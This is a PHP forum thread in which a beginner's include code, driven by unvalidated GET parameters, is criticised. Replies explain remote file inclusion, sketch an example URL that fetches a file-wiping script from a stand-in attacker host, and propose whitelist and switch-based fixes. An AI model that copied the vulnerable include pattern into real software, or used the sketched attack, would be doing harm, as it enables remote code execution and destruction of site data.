PHP Includes

  • MasterSlowPoke
  • Newbie
  • Newbie
  • MasterSlowPoke
  • Posts: 7
  • Loc: Tampa

Post 3+ Months Ago

I include the variable portion of my site, and have the static portions remain. I only use one .PHP. A while back, someone on some forum said my code was inefficent, but didn't explain why. I'm rebuiling my site, and would like to see how I could soup it up. This is my current code.

Code: [ Select ]
the top banner, layout, ect
<?php
  if(!empty($HTTP_GET_VARS[page]) and file_exists("./$HTTP_GET_VARS[page].inc"))
   { include("./$HTTP_GET_VARS[page].inc"); }
  elseif(!empty($HTTP_GET_VARS[album]) and file_exists("photos/$HTTP_GET_VARS[album].inc"))
   { include("photos/$HTTP_GET_VARS[album].inc"); }
  else {
    include("./main.inc");
  }
?>
the footer, </body> ect        
  1. the top banner, layout, ect
  2. <?php
  3.   if(!empty($HTTP_GET_VARS[page]) and file_exists("./$HTTP_GET_VARS[page].inc"))
  4.    { include("./$HTTP_GET_VARS[page].inc"); }
  5.   elseif(!empty($HTTP_GET_VARS[album]) and file_exists("photos/$HTTP_GET_VARS[album].inc"))
  6.    { include("photos/$HTTP_GET_VARS[album].inc"); }
  7.   else {
  8.     include("./main.inc");
  9.   }
  10. ?>
  11. the footer, </body> ect        
  • Scorpius
  • Proficient
  • Proficient
  • User avatar
  • Posts: 401
  • Loc: Scorpion Hole

Post 3+ Months Ago

Ok, well first off you don't need to use $HTTP_GET_VARS anymore, unless you are using a really old version of PHP, you can just use $_GET[variable].
Second, what he probably meant was it showed too much information about your pages. Like exactly where they were placed at. Now if you wanted to you could use Apache's mod_rewrite function. Lots of websites are using this now to hide their full urls from their users. For example, Ozzu does it.
But you can have something like http://www.yoursite.com/content/pagename
You can look here: http://www.ozzu.com/programming-forum/quick-tip-mod-rewrite-t23460.html for a detailed explanation on how to setup your rewirte design.
  • rjstephens
  • Professor
  • Professor
  • User avatar
  • Posts: 774
  • Loc: Brisbane, Australia

Post 3+ Months Ago

I can't remember how to exploit it offhand, but you should NEVER do anything with an include that is based on user input unless you validate it first - it opens you up to easy hacing.
  • MasterSlowPoke
  • Newbie
  • Newbie
  • MasterSlowPoke
  • Posts: 7
  • Loc: Tampa

Post 3+ Months Ago

All I use are links so I think I should be safe.

What would be the advantage of the rewrite dealie? It seems like it would just change what the links look like, the code I use would be the same.
  • rjstephens
  • Professor
  • Professor
  • User avatar
  • Posts: 774
  • Loc: Brisbane, Australia

Post 3+ Months Ago

just because you are only using links doesn't make it safe. You are at just as much risk. What's stopping people from changing the URL?
  • rtm223
  • Mastermind
  • Mastermind
  • User avatar
  • Posts: 1855
  • Loc: Uk

Post 3+ Months Ago

As I recall, the exploit goes <i>something</i> along the lines of typing in:

http://www.yourdomain.com/?http://www.e ... m/wipe_hdd

which goes and gets wipe_hdd.inc (by http) from evilbastard.com and then happily runs any php code in that file. In this case, a nice little script that deletes all the files on your website. I'm not sure if that is 100% correct. There are a hell of a lot of exploits like this, and I have never used them, I just learned the techniques to guard against them.

In your situation, the simplist way of doing it would be to do a variation on the following:

Code: [ Select ]
$allowedPages = array(
  'pageName1' => 1,
  'pageName2' => 1,
  'pageName3' => 1,
  'pageName4' => 1
);

if (isset($allowedPages[$_GET['page']) && $allowedPages[$_GET['page']){
  //test for the file existing if you want
  //load the file
}
  1. $allowedPages = array(
  2.   'pageName1' => 1,
  3.   'pageName2' => 1,
  4.   'pageName3' => 1,
  5.   'pageName4' => 1
  6. );
  7. if (isset($allowedPages[$_GET['page']) && $allowedPages[$_GET['page']){
  8.   //test for the file existing if you want
  9.   //load the file
  10. }

This will check to see if the file is allowed as defined by that array. You can also set elements to 0 to temporarily disable a page, without having to delete it. Just a handy extra thing I thought up.
  • Rabid Dog
  • Web Master
  • Web Master
  • User avatar
  • Posts: 3245
  • Loc: South Africa

Post 3+ Months Ago

This is one of the reasons that I don't use dynamic include statements.

I rather create seperate functions with strong exception handling.

Always remember to test user input, I find passing an integer rather than a string works nicely (makes it difficult to guess), check whether the value is an int, make your selection in a case statement and have a dfeault case to fail on any anomilies.

Whats nice about this is that you can set constants to have a more discriptive Name ie
PHP Code: [ Select ]
 
define("ACTION_RETRIEVE_PAGE","1")
 
 
  1.  
  2. define("ACTION_RETRIEVE_PAGE","1")
  3.  
  4.  


and in your select statement
PHP Code: [ Select ]
 
switch($inputVar){
 
 case 1:
 
  //do stuff
 
 break;
 
 default:
 
  // error generated
 
}
 
 
  1.  
  2. switch($inputVar){
  3.  
  4.  case 1:
  5.  
  6.   //do stuff
  7.  
  8.  break;
  9.  
  10.  default:
  11.  
  12.   // error generated
  13.  
  14. }
  15.  
  16.  

(not sure if the syntax is right but you get the idea)
Anyways that's just me
  • MasterSlowPoke
  • Newbie
  • Newbie
  • MasterSlowPoke
  • Posts: 7
  • Loc: Tampa

Post 3+ Months Ago

For the rewrite thing then, couldn't they type in indexhttp://www.haxxorz/malscript.php, or does that not work/ assumes that they know exactly how the rewrite works and wouldn't usually happen?

As for the allowed pages thing, all I would have to do is add the include to the list, then paste that if statement above the includes, then after the includes have an else statement that loads an omg haxxor page or something?

Sorry, I know little of php, I pretty much just copied my include statement off a tutorial, though I did write the elseif by myself. I was so happy when I finally got the statement right, I tried to guess the right word for a half hour or so before I finally tried elseif.

Post Information

  • Total Posts in this topic: 8 posts
  • Users browsing this forum: No registered users and 23 guests
  • You cannot post new topics in this forum
  • You cannot reply to topics in this forum
  • You cannot edit your posts in this forum
  • You cannot delete your posts in this forum
  • You cannot post attachments in this forum
 
 

© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.